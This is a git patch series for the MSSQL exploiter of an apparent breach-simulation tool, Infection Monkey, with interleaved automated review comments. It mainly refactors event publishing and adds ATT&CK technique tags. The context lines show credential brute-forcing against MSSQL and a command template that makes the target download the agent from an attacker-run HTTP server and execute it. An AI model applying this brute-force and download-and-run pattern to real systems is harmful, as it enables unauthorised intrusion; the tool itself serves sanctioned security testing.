From 8dd196122b0974f52e5d3f06b4960cf9500b8795 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 14:46:35 +0000 Subject: [PATCH 01/15] Agent: Publish events from MSSQLExploiter --- monkey/infection_monkey/exploit/mssqlexec.py | 23 ++++++++++++++------ 1 file changed, 16 insertions(+), 7 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index a2a63eec8..fde399d10 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -1,7 +1,7 @@ import logging from pathlib import PureWindowsPath from time import sleep -from typing import Sequence, Tuple +from typing import Iterable, Tuple import pymssql @@ -42,7 +42,7 @@ class MSSQLExploiter(HostExploiter): self.agent_http_path = None def _exploit_host(self) -> ExploiterResultData: - agent_path_on_victim = get_agent_dst_path(self.host) + agent_path_on_victim = PureWindowsPath(get_agent_dst_path(self.host)) # Brute force to get connection creds = generate_identity_secret_pairs( @@ -72,15 +72,17 @@ class MSSQLExploiter(HostExploiter): ) logger.error(error_message) + self.publish_propagation_event(self.host.ip_addr, False, error_message=error_message) self.exploit_result.error_message = error_message return self.exploit_result + self.publish_propagation_event(self.host.ip_addr, True) self.exploit_result.propagation_success = True return self.exploit_result def _brute_force( - self, host: str, port: str, users_passwords_pairs_list: Sequence[Tuple[str, str]] + self, host: str, port: str, users_passwords_pairs_list: Iterable[Tuple[str, str]] ) -> pymssql.Cursor: """ Starts the brute force connection attempts and if needed then init the payload process. 
@@ -122,12 +124,13 @@ class MSSQLExploiter(HostExploiter): ) self.exploit_result.exploitation_success = True self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) - self.report_login_attempt(True, user, password) + self._report_login_attempt(True, host, user, password) cursor = conn.cursor() return cursor except pymssql.OperationalError as err: - logger.info(f"Connection to MSSQL failed: {err}") - self.report_login_attempt(False, user, password) + error_message = f"Connection to MSSQL failed: {err}" + logger.info(error_message) + self._report_login_attempt(False, host, user, password, error_message) # Combo didn't work, hopping to the next one pass @@ -139,6 +142,12 @@ class MSSQLExploiter(HostExploiter): "Bruteforce process failed on host: {0}".format(self.host.ip_addr) ) + def _report_login_attempt( + self, success: bool, host: str, user, password: str, message: str = "" + ): + self.publish_exploitation_event(host, success, error_message=message) + self.report_login_attempt(success, user, password) + def _upload_agent(self, agent_path_on_victim: PureWindowsPath): http_thread = self._start_agent_server(agent_path_on_victim) @@ -179,7 +188,7 @@ class MSSQLExploiter(HostExploiter): def _build_agent_launch_command(self, agent_path_on_victim: PureWindowsPath) -> str: agent_args = build_monkey_commandline( - self.servers, self.current_depth + 1, agent_path_on_victim + self.servers, self.current_depth + 1, str(agent_path_on_victim) ) return f"{agent_path_on_victim} {DROPPER_ARG} {agent_args}" From 2cd9d0086bdd03661838e32f201bfccca0262ef8 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Tue, 4 Oct 2022 15:21:46 +0000 Subject: [PATCH 02/15] Agent: Fix mypy error in http_tools.py --- monkey/infection_monkey/exploit/tools/http_tools.py | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/monkey/infection_monkey/exploit/tools/http_tools.py b/monkey/infection_monkey/exploit/tools/http_tools.py index a24fb909e..70adf3d7b 100644 
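Review bot: The new `error_message` forwards the raw `pymssql.OperationalError` text through `_report_login_attempt` into the published exploitation event, so whatever the driver puts in that string — for a rejected login this is typically multi-line DB-Lib output that also names the attempted user — reaches the event stream verbatim. If the event is meant to carry a compact reason, publish a fixed string and keep the driver detail in the log: `logger.info("Connection to MSSQL failed: %s", err)` followed by `self._report_login_attempt(False, host, user, password, "Connection to MSSQL failed")`. Whether the event consumer wants the full driver text is not visible here, so treat this as a question to settle rather than a defect. `_brute_force` begins and ends outside this hunk.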
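Review bot: `_report_login_attempt` is introduced without a docstring, and `user` is the only parameter left unannotated while `password: str` and `message: str` are typed. A one-line docstring such as `"""Publish an exploitation event for this credential attempt and record it in the exploit report."""` plus `user: str` (assuming `generate_identity_secret_pairs` yields string identities — not visible in this hunk) would make the helper self-explanatory. The plaintext `password` being handed to `report_login_attempt` is pre-existing behaviour, but a short comment on that call saying it is intentional would spare the next reader the same question.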
--- a/monkey/infection_monkey/exploit/tools/http_tools.py +++ b/monkey/infection_monkey/exploit/tools/http_tools.py @@ -3,6 +3,7 @@ import urllib.error import urllib.parse import urllib.request from threading import Lock +from typing import Optional, Tuple from infection_monkey.network.firewall import app as firewall from infection_monkey.network.info import get_free_tcp_port @@ -28,7 +29,7 @@ class HTTPTools(object): @staticmethod def create_locked_transfer( host, dropper_target_path, agent_binary_repository, local_ip=None, local_port=None - ) -> LockedHTTPServer: + ) -> Tuple[Optional[str], Optional[LockedHTTPServer]]: """ Create http server for file transfer with a lock :param host: Variable with target's information From 33230e85f75bce9c8fa6197c99a70b8e3f66e7d5 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 12:51:59 +0000 Subject: [PATCH 03/15] Agent: Use updated publish methods --- monkey/infection_monkey/exploit/mssqlexec.py | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index fde399d10..6b4de1fc2 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -52,10 +52,12 @@ class MSSQLExploiter(HostExploiter): try: self.cursor = self._brute_force(self.host.ip_addr, self.SQL_DEFAULT_TCP_PORT, creds) except FailedExploitationError: - logger.info( + error_message = ( f"Failed brute-forcing of MSSQL server on {self.host}," f" no credentials were successful" ) + logger.error(error_message) + self._publish_exploitation_event(self.host.ip_addr, False, error_message=error_message) return self.exploit_result if self._is_interrupted(): 
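Review bot: The return annotation now declares that `create_locked_transfer` can yield `(None, None)`, but the docstring, which continues past this hunk, still documents only the parameters, so callers have no stated rule for when the server is absent — and every caller now needs an `is None` check before using the path or stopping the server. Add a return line along the lines of `:return: (URL the target should fetch the agent from, running LockedHTTPServer), or (None, None) when the transfer could not be set up`, naming the concrete failure conditions from the body. The function body lies outside this hunk.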
@@ -72,12 +74,12 @@ class MSSQLExploiter(HostExploiter): ) logger.error(error_message) - self.publish_propagation_event(self.host.ip_addr, False, error_message=error_message) + self._publish_propagation_event(self.host.ip_addr, False, error_message=error_message) self.exploit_result.error_message = error_message return self.exploit_result - self.publish_propagation_event(self.host.ip_addr, True) + self._publish_propagation_event(self.host.ip_addr, True) self.exploit_result.propagation_success = True return self.exploit_result @@ -145,7 +147,7 @@ class MSSQLExploiter(HostExploiter): def _report_login_attempt( self, success: bool, host: str, user, password: str, message: str = "" ): - self.publish_exploitation_event(host, success, error_message=message) + self._publish_exploitation_event(host, success, error_message=message) self.report_login_attempt(success, user, password) def _upload_agent(self, agent_path_on_victim: PureWindowsPath): From 183bd1145faa46ed3002ed67d37ee70b8beaa8d1 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 13:07:28 +0000 Subject: [PATCH 04/15] Agent: Add tags to MSSQL exploitation events --- monkey/infection_monkey/exploit/mssqlexec.py | 13 +++++++++++-- 1 file changed, 11 insertions(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 6b4de1fc2..f3bda8d52 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -7,6 +7,10 @@ import pymssql from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.credentials import get_plaintext +from common.tags import ( + T1110_ATTACK_TECHNIQUE_TAG, + T1210_ATTACK_TECHNIQUE_TAG, +) from common.utils.exceptions import FailedExploitationError from infection_monkey.exploit.HostExploiter import HostExploiter from infection_monkey.exploit.tools.helpers import get_agent_dst_path 
@@ -20,6 +24,9 @@ from infection_monkey.utils.threading import interruptible_iter logger = logging.getLogger(__name__) +MSSQL_EXPLOITER_TAG = "mssql-exploiter" +EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + class MSSQLExploiter(HostExploiter): _EXPLOITED_SERVICE = "MSSQL" @@ -57,7 +64,9 @@ class MSSQLExploiter(HostExploiter): f" no credentials were successful" ) logger.error(error_message) - self._publish_exploitation_event(self.host.ip_addr, False, error_message=error_message) + self._publish_exploitation_event( + self.host.ip_addr, False, EXPLOITER_TAGS, error_message + ) return self.exploit_result if self._is_interrupted(): @@ -147,7 +156,7 @@ class MSSQLExploiter(HostExploiter): def _report_login_attempt( self, success: bool, host: str, user, password: str, message: str = "" ): - self._publish_exploitation_event(host, success, error_message=message) + self._publish_exploitation_event(host, success, EXPLOITER_TAGS, error_message=message) self.report_login_attempt(success, user, password) def _upload_agent(self, agent_path_on_victim: PureWindowsPath): From fa8b721abef404443f1bff93a60f197d06ccf5c8 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 13:23:13 +0000 Subject: [PATCH 05/15] Common: Add attack technique T1059 --- monkey/common/tags/__init__.py | 1 + monkey/common/tags/attack.py | 1 + 2 files changed, 2 insertions(+) diff --git a/monkey/common/tags/__init__.py b/monkey/common/tags/__init__.py index ea08aa9f5..fb30c71df 100644 --- a/monkey/common/tags/__init__.py +++ b/monkey/common/tags/__init__.py @@ -2,6 +2,7 @@ from .attack import ( T1003_ATTACK_TECHNIQUE_TAG, T1005_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG, + T1059_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG, diff --git a/monkey/common/tags/attack.py b/monkey/common/tags/attack.py index e8881dfa7..5c3a8d117 100644 --- a/monkey/common/tags/attack.py 
+++ b/monkey/common/tags/attack.py @@ -1,6 +1,7 @@ T1003_ATTACK_TECHNIQUE_TAG = "attack-t1003" T1005_ATTACK_TECHNIQUE_TAG = "attack-t1005" T1021_ATTACK_TECHNIQUE_TAG = "attack-t1021" +T1059_ATTACK_TECHNIQUE_TAG = "attack-t1059" T1098_ATTACK_TECHNIQUE_TAG = "attack-t1098" T1105_ATTACK_TECHNIQUE_TAG = "attack-t1105" T1110_ATTACK_TECHNIQUE_TAG = "attack-t1110" From aab965bad7a2d532257437195de1302188c6115d Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 13:28:08 +0000 Subject: [PATCH 06/15] Common: Add attack technique T1071 --- monkey/common/tags/__init__.py | 1 + monkey/common/tags/attack.py | 1 + 2 files changed, 2 insertions(+) diff --git a/monkey/common/tags/__init__.py b/monkey/common/tags/__init__.py index fb30c71df..e8b6842e3 100644 --- a/monkey/common/tags/__init__.py +++ b/monkey/common/tags/__init__.py @@ -3,6 +3,7 @@ from .attack import ( T1005_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1059_ATTACK_TECHNIQUE_TAG, + T1071_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG, diff --git a/monkey/common/tags/attack.py b/monkey/common/tags/attack.py index 5c3a8d117..8bb748754 100644 --- a/monkey/common/tags/attack.py +++ b/monkey/common/tags/attack.py @@ -2,6 +2,7 @@ T1003_ATTACK_TECHNIQUE_TAG = "attack-t1003" T1005_ATTACK_TECHNIQUE_TAG = "attack-t1005" T1021_ATTACK_TECHNIQUE_TAG = "attack-t1021" T1059_ATTACK_TECHNIQUE_TAG = "attack-t1059" +T1071_ATTACK_TECHNIQUE_TAG = "attack-t1071" T1098_ATTACK_TECHNIQUE_TAG = "attack-t1098" T1105_ATTACK_TECHNIQUE_TAG = "attack-t1105" T1110_ATTACK_TECHNIQUE_TAG = "attack-t1110" From 8317c03686f48e67cf3a4d74b58ba2796f318d9d Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 13:29:03 +0000 Subject: [PATCH 07/15] Agent: Add tags to MSSQL propagation events --- monkey/infection_monkey/exploit/mssqlexec.py | 15 +++++++++++++-- 1 file changed, 13 insertions(+), 2 deletions(-) 
diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index f3bda8d52..231a09fc2 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -8,6 +8,9 @@ import pymssql from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.credentials import get_plaintext from common.tags import ( + T1059_ATTACK_TECHNIQUE_TAG, + T1071_ATTACK_TECHNIQUE_TAG, + T1105_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG, ) @@ -26,6 +29,12 @@ logger = logging.getLogger(__name__) MSSQL_EXPLOITER_TAG = "mssql-exploiter" EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) +PROPAGATION_TAGS = ( + MSSQL_EXPLOITER_TAG, + T1059_ATTACK_TECHNIQUE_TAG, + T1071_ATTACK_TECHNIQUE_TAG, + T1105_ATTACK_TECHNIQUE_TAG, +) class MSSQLExploiter(HostExploiter): @@ -83,12 +92,14 @@ class MSSQLExploiter(HostExploiter): ) logger.error(error_message) - self._publish_propagation_event(self.host.ip_addr, False, error_message=error_message) + self._publish_propagation_event( + self.host.ip_addr, False, PROPAGATION_TAGS, error_message + ) self.exploit_result.error_message = error_message return self.exploit_result - self._publish_propagation_event(self.host.ip_addr, True) + self._publish_propagation_event(self.host.ip_addr, True, PROPAGATION_TAGS) self.exploit_result.propagation_success = True return self.exploit_result From 9269c8579cd387959e812dd51c4d3f3f841ee54b Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:35:34 +0000 Subject: [PATCH 08/15] Agent: Remove unneccessary technique --- monkey/infection_monkey/exploit/mssqlexec.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 231a09fc2..cc93f084c 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py 
@@ -9,7 +9,6 @@ from common.common_consts.timeouts import LONG_REQUEST_TIMEOUT from common.credentials import get_plaintext from common.tags import ( T1059_ATTACK_TECHNIQUE_TAG, - T1071_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG, @@ -32,7 +31,6 @@ EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_ PROPAGATION_TAGS = ( MSSQL_EXPLOITER_TAG, T1059_ATTACK_TECHNIQUE_TAG, - T1071_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG, ) From 5c6b1e3910124d9f0ba6cd7f6deedabe03844402 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:36:07 +0000 Subject: [PATCH 09/15] Common: Remove unused technique T1071 --- monkey/common/tags/__init__.py | 1 - monkey/common/tags/attack.py | 1 - 2 files changed, 2 deletions(-) diff --git a/monkey/common/tags/__init__.py b/monkey/common/tags/__init__.py index e8b6842e3..fb30c71df 100644 --- a/monkey/common/tags/__init__.py +++ b/monkey/common/tags/__init__.py @@ -3,7 +3,6 @@ from .attack import ( T1005_ATTACK_TECHNIQUE_TAG, T1021_ATTACK_TECHNIQUE_TAG, T1059_ATTACK_TECHNIQUE_TAG, - T1071_ATTACK_TECHNIQUE_TAG, T1098_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG, T1110_ATTACK_TECHNIQUE_TAG, diff --git a/monkey/common/tags/attack.py b/monkey/common/tags/attack.py index 8bb748754..5c3a8d117 100644 --- a/monkey/common/tags/attack.py +++ b/monkey/common/tags/attack.py @@ -2,7 +2,6 @@ T1003_ATTACK_TECHNIQUE_TAG = "attack-t1003" T1005_ATTACK_TECHNIQUE_TAG = "attack-t1005" T1021_ATTACK_TECHNIQUE_TAG = "attack-t1021" T1059_ATTACK_TECHNIQUE_TAG = "attack-t1059" -T1071_ATTACK_TECHNIQUE_TAG = "attack-t1071" T1098_ATTACK_TECHNIQUE_TAG = "attack-t1098" T1105_ATTACK_TECHNIQUE_TAG = "attack-t1105" T1110_ATTACK_TECHNIQUE_TAG = "attack-t1110" From e4044163638b2e239a3d105645885e59d6592a37 Mon Sep 17 00:00:00 2001 
From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:41:47 +0000 Subject: [PATCH 10/15] Agent: Use exploit tag properties --- monkey/infection_monkey/exploit/mssqlexec.py | 32 ++++++++------------ 1 file changed, 13 insertions(+), 19 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index cc93f084c..34a272bfc 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -27,12 +27,6 @@ from infection_monkey.utils.threading import interruptible_iter logger = logging.getLogger(__name__) MSSQL_EXPLOITER_TAG = "mssql-exploiter" -EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) -PROPAGATION_TAGS = ( - MSSQL_EXPLOITER_TAG, - T1059_ATTACK_TECHNIQUE_TAG, - T1105_ATTACK_TECHNIQUE_TAG, -) class MSSQLExploiter(HostExploiter): @@ -50,6 +44,12 @@ class MSSQLExploiter(HostExploiter): "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" ) + def _exploiter_tags(self) -> Tuple[str, ...]: + return (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + + def _propagation_tags(self) -> Tuple[str, ...]: + return (MSSQL_EXPLOITER_TAG, T1059_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG) + def __init__(self): super().__init__() self.cursor = None @@ -71,9 +71,7 @@ class MSSQLExploiter(HostExploiter): f" no credentials were successful" ) logger.error(error_message) - self._publish_exploitation_event( - self.host.ip_addr, False, EXPLOITER_TAGS, error_message - ) + self._publish_exploitation_event(False, error_message=error_message) return self.exploit_result if self._is_interrupted(): 
@@ -90,14 +88,12 @@ class MSSQLExploiter(HostExploiter): ) logger.error(error_message) - self._publish_propagation_event( - self.host.ip_addr, False, PROPAGATION_TAGS, error_message - ) + self._publish_propagation_event(success=False, error_message=error_message) self.exploit_result.error_message = error_message return self.exploit_result - self._publish_propagation_event(self.host.ip_addr, True, PROPAGATION_TAGS) + self._publish_propagation_event(success=True) self.exploit_result.propagation_success = True return self.exploit_result @@ -144,13 +140,13 @@ class MSSQLExploiter(HostExploiter): ) self.exploit_result.exploitation_success = True self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) - self._report_login_attempt(True, host, user, password) + self._report_login_attempt(True, user, password) cursor = conn.cursor() return cursor except pymssql.OperationalError as err: error_message = f"Connection to MSSQL failed: {err}" logger.info(error_message) - self._report_login_attempt(False, host, user, password, error_message) + self._report_login_attempt(False, user, password, error_message) # Combo didn't work, hopping to the next one pass @@ -162,10 +158,8 @@ class MSSQLExploiter(HostExploiter): "Bruteforce process failed on host: {0}".format(self.host.ip_addr) ) - def _report_login_attempt( - self, success: bool, host: str, user, password: str, message: str = "" - ): - self._publish_exploitation_event(host, success, EXPLOITER_TAGS, error_message=message) + def _report_login_attempt(self, success: bool, user, password: str, message: str = ""): + self._publish_exploitation_event(success=success, error_message=message) self.report_login_attempt(success, user, password) def _upload_agent(self, agent_path_on_victim: PureWindowsPath): From 66f8471f24510995f63876f471495a85c205a288 Mon Sep 17 00:00:00 2001 
From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:46:29 +0000 Subject: [PATCH 11/15] Agent: Remove "summary" event --- monkey/infection_monkey/exploit/mssqlexec.py | 1 - 1 file changed, 1 deletion(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 34a272bfc..a3e0e7fd9 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -71,7 +71,6 @@ class MSSQLExploiter(HostExploiter): f" no credentials were successful" ) logger.error(error_message) - self._publish_exploitation_event(False, error_message=error_message) return self.exploit_result if self._is_interrupted(): From 15974ff21cd7fc6297ca0c7da3bac0851f9223e1 Mon Sep 17 00:00:00 2001 From: Kekoa Kaaikala Date: Wed, 5 Oct 2022 20:49:08 +0000 Subject: [PATCH 12/15] Agent: Stamp time before running exploit --- monkey/infection_monkey/exploit/mssqlexec.py | 18 +++++++++++------- 1 file changed, 11 insertions(+), 7 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index a3e0e7fd9..380d88425 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -1,6 +1,6 @@ import logging from pathlib import PureWindowsPath -from time import sleep +from time import sleep, time from typing import Iterable, Tuple import pymssql @@ -77,6 +77,7 @@ class MSSQLExploiter(HostExploiter): self._set_interrupted() return self.exploit_result + timestamp = time() try: self._upload_agent(agent_path_on_victim) self._run_agent(agent_path_on_victim) 
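Review bot: With the summary event dropped, the brute-force failure branch only logs `error_message` and returns `self.exploit_result` with no reason attached, whereas the propagation failure branch further down stores its message with `self.exploit_result.error_message = error_message`. Mirroring that here — `self.exploit_result.error_message = error_message` immediately before the `return self.exploit_result` — keeps the two failure paths consistent and lets the island report why exploitation of this host failed. `_exploit_host` begins and ends outside this hunk.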
@@ -87,12 +88,12 @@ class MSSQLExploiter(HostExploiter): ) logger.error(error_message) - self._publish_propagation_event(success=False, error_message=error_message) + self._publish_propagation_event(timestamp, False, error_message=error_message) self.exploit_result.error_message = error_message return self.exploit_result - self._publish_propagation_event(success=True) + self._publish_propagation_event(timestamp, True) self.exploit_result.propagation_success = True return self.exploit_result @@ -123,6 +124,7 @@ class MSSQLExploiter(HostExploiter): ) for user, password in credentials_iterator: + timestamp = time() try: # Core steps # Trying to connect @@ -139,13 +141,13 @@ class MSSQLExploiter(HostExploiter): ) self.exploit_result.exploitation_success = True self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) - self._report_login_attempt(True, user, password) + self._report_login_attempt(timestamp, True, user, password) cursor = conn.cursor() return cursor except pymssql.OperationalError as err: error_message = f"Connection to MSSQL failed: {err}" logger.info(error_message) - self._report_login_attempt(False, user, password, error_message) + self._report_login_attempt(timestamp, False, user, password, error_message) # Combo didn't work, hopping to the next one pass @@ -157,8 +159,10 @@ class MSSQLExploiter(HostExploiter): "Bruteforce process failed on host: {0}".format(self.host.ip_addr) ) - def _report_login_attempt(self, success: bool, user, password: str, message: str = ""): - self._publish_exploitation_event(success=success, error_message=message) + def _report_login_attempt( + self, timestamp: float, success: bool, user, password: str, message: str = "" + ): + self._publish_exploitation_event(timestamp, success, error_message=message) self.report_login_attempt(success, user, password) def _upload_agent(self, agent_path_on_victim: PureWindowsPath): From 47846628e6d1a53c4f49e309eedd30a8ac416495 Mon Sep 17 00:00:00 2001 
From: Ilija Lazoroski Date: Thu, 6 Oct 2022 13:47:11 +0200 Subject: [PATCH 13/15] Agent: Modify MSSQL tags to be properties --- monkey/infection_monkey/exploit/mssqlexec.py | 11 ++++++----- 1 file changed, 6 insertions(+), 5 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 380d88425..802060136 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -44,11 +44,12 @@ class MSSQLExploiter(HostExploiter): "DownloadFile(^''{http_path}^'' , ^''{dst_path}^'')" ) - def _exploiter_tags(self) -> Tuple[str, ...]: - return (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) - - def _propagation_tags(self) -> Tuple[str, ...]: - return (MSSQL_EXPLOITER_TAG, T1059_ATTACK_TECHNIQUE_TAG, T1105_ATTACK_TECHNIQUE_TAG) + _EXPLOITER_TAGS = (MSSQL_EXPLOITER_TAG, T1110_ATTACK_TECHNIQUE_TAG, T1210_ATTACK_TECHNIQUE_TAG) + _PROPAGATION_TAGS = ( + MSSQL_EXPLOITER_TAG, + T1059_ATTACK_TECHNIQUE_TAG, + T1105_ATTACK_TECHNIQUE_TAG, + ) def __init__(self): super().__init__() From ec617df06ad5aac4e04cb079680cda609aaa0ab4 Mon Sep 17 00:00:00 2001 From: Ilija Lazoroski Date: Thu, 6 Oct 2022 13:53:17 +0200 Subject: [PATCH 14/15] Agent: Fix LocketHTTPServer mypy error in MSSQLExploiter --- monkey/infection_monkey/exploit/mssqlexec.py | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 802060136..72a250983 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -1,7 +1,7 @@ import logging from pathlib import PureWindowsPath from time import sleep, time -from typing import Iterable, Tuple +from typing import Iterable, Optional, Tuple import pymssql 
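Review bot: `_EXPLOITER_TAGS` and `_PROPAGATION_TAGS` are bare tuples of opaque constants, so a reader has to look up each ATT&CK ID to see why the login attempts are tagged as brute force and remote-service exploitation while the propagation step is tagged as command execution and ingress tool transfer. Add a comment above each, e.g. `# ATT&CK: T1110 Brute Force, T1210 Exploitation of Remote Services` and `# ATT&CK: T1059 Command and Scripting Interpreter, T1105 Ingress Tool Transfer`, and name the consumer — presumably the base class's `_publish_exploitation_event`/`_publish_propagation_event`, which is not visible here. The commit title calls these "properties", but they are plain class attributes; aligning the wording avoids a misleading history entry. The class continues outside this hunk.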
@@ -171,9 +171,12 @@ class MSSQLExploiter(HostExploiter): self._run_agent_download_command(agent_path_on_victim) - MSSQLExploiter._stop_agent_server(http_thread) + if http_thread: + MSSQLExploiter._stop_agent_server(http_thread) - def _start_agent_server(self, agent_path_on_victim: PureWindowsPath) -> LockedHTTPServer: + def _start_agent_server( + self, agent_path_on_victim: PureWindowsPath + ) -> Optional[LockedHTTPServer]: self.agent_http_path, http_thread = HTTPTools.create_locked_transfer( self.host, str(agent_path_on_victim), self.agent_binary_repository ) From a558948c5d0ca7093a7af34ff0be0709d783a0cd Mon Sep 17 00:00:00 2001 From: Mike Salvatore Date: Fri, 7 Oct 2022 08:43:05 -0400 Subject: [PATCH 15/15] Agent: Remove unnecessary `pass` from MSSQLExploiter --- monkey/infection_monkey/exploit/mssqlexec.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/monkey/infection_monkey/exploit/mssqlexec.py b/monkey/infection_monkey/exploit/mssqlexec.py index 72a250983..a6f8fd5ce 100644 --- a/monkey/infection_monkey/exploit/mssqlexec.py +++ b/monkey/infection_monkey/exploit/mssqlexec.py @@ -144,13 +144,12 @@ class MSSQLExploiter(HostExploiter): self.add_vuln_port(MSSQLExploiter.SQL_DEFAULT_TCP_PORT) self._report_login_attempt(timestamp, True, user, password) cursor = conn.cursor() + return cursor except pymssql.OperationalError as err: error_message = f"Connection to MSSQL failed: {err}" logger.info(error_message) self._report_login_attempt(timestamp, False, user, password, error_message) - # Combo didn't work, hopping to the next one - pass logger.warning( "No user/password combo was able to connect to host: {0}:{1}, "
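Review bot: The `if http_thread:` guard sits after `self._run_agent_download_command(agent_path_on_victim)`, so when `_start_agent_server` returns `None` — now a declared possibility — the download command is still issued to the target (with `self.agent_http_path`, assigned from the same `create_locked_transfer` call, likely `None` as well) and only the cleanup is skipped. The check belongs in `_upload_agent` directly after `http_thread = self._start_agent_server(agent_path_on_victim)`, which is above this hunk: `if http_thread is None or self.agent_http_path is None: raise FailedExploitationError("Could not start the HTTP server that serves the agent binary")`; `FailedExploitationError` is already imported in this module, and with that early exit the later `if http_thread:` becomes unnecessary. Whether the `except` around `_upload_agent` in `_exploit_host` catches this exception type is outside this view and should be confirmed. `_upload_agent` begins outside the hunk and `_start_agent_server` ends outside it.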